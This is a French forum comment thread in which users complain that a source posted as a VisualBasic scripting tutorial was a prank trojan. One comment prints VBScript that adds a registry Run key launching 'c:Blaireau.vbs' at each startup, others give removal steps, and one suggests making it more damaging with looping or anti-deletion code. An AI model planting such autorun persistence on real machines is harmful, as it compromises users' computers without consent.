COMMENT GÉNÉRER DU SCRIPT DEPUIS VISUALBASIC

mémère - 26 mars 2001 à 19:54
cs_raff Messages postés 182 Date d'inscription dimanche 18 août 2002 Statut Membre Dernière intervention 5 janvier 2004 - 13 janv. 2003 à 04:51
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/797-comment-generer-du-script-depuis-visualbasic

cs_raff Messages postés 182 Date d'inscription dimanche 18 août 2002 Statut Membre Dernière intervention 5 janvier 2004 3
13 janv. 2003 à 04:51
Dim fso, dirsystem
Set fso = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Set dirsystem = fso.GetSpecialFolder(1)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunDerrick","wscript c:Blaireau.vbs"
Msgbox "T Niké"
cs_Mémère Messages postés 222 Date d'inscription samedi 24 mars 2001 Statut Membre Dernière intervention 24 juin 2007
7 nov. 2002 à 13:16
- mdr -
psykocrash Messages postés 240 Date d'inscription vendredi 14 juin 2002 Statut Membre Dernière intervention 17 mars 2009
22 juin 2002 à 20:10
et, le pirate, ce site est fais pour aider ceux qui ne sont pas au top en programmation, pas pour les faire chier...
sinon, si tu vraiment faire chier le monde avec ton prog, t'aurais au moin pu mettre quelque chose du genre une boucle qui lance des milliers de fois ton virus, histoire de ralentir a fond l'ordi infecté...
humpf t'aurais pu foutre une boucle d'antieffacement
meme pour raison pedagogique, je ne vois pas l'interet de laisser ce script sur le site
c un peut facile de voire que tu a écrit une clé de la BDR a l'envers!!!!
- mdr -
vas te faire foutre
25 avril 2001 à 00:05
Si par malheur vous avez exécuté le prog que ce cher c_n a fait je vous conseilles d'aller dans menu démarer --> Exécuter : Regedit--> dans l'arboressance de regedit :allez dans :
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun.
là vous y trouverez des icones avec des noms d'applications.
Recherchez l'application "Derrick" qui est registrée pour le programme de script :"c:Blaireau.vbs".
SUPPRIMEZ cette clé !
fermez Regedit
enfin supprimez le fichier :
"c:Blaireau.vbs"

Notre pirate a ceci-dit beaucoup d'humour !
Mais je regarde quand à moi souvent "Derrick" alors c'était une enquête un peu facile !
vas te faire foutre
24 avril 2001 à 23:56
Tu aimes les cheveaux de Troy!:"Msgbox "T Niké""
Je vois les étoiles !
c:Blaireau.vbs
C'est un délit ! punis par la loi ! Alors merci pour le tuyaux mais fais gaffe quand même !
tu fais chier ! faut que j'ailles dans regedit maintenant !
"wscript c:Blaireau.vbs"
Je croyais ke c t un minimum sérieux... mais je vois k il y a des lamers partout.. Ce genre de conneries devraient pas etre sur un site de kalité kom celui la.. dommage..
sacré mémère t bon mais t tout de meme un sacré couillon ... ca se fait pas ca sur ce genre de site mec, putain, t abuse la, putain mon gars...c pas de profiter quand on trouve une proie facile, le but du jeu...très mesquin gazié...t as honte de rien quoi...
BlackWizzard
28 mars 2001 à 18:55
Bof...
je vais suivre les conseils de Nix...
je sais pas à koi servent les API mais elles ont pas l'air de creer des etoiles 3D en tt cas...
Permettez que je me mette 1?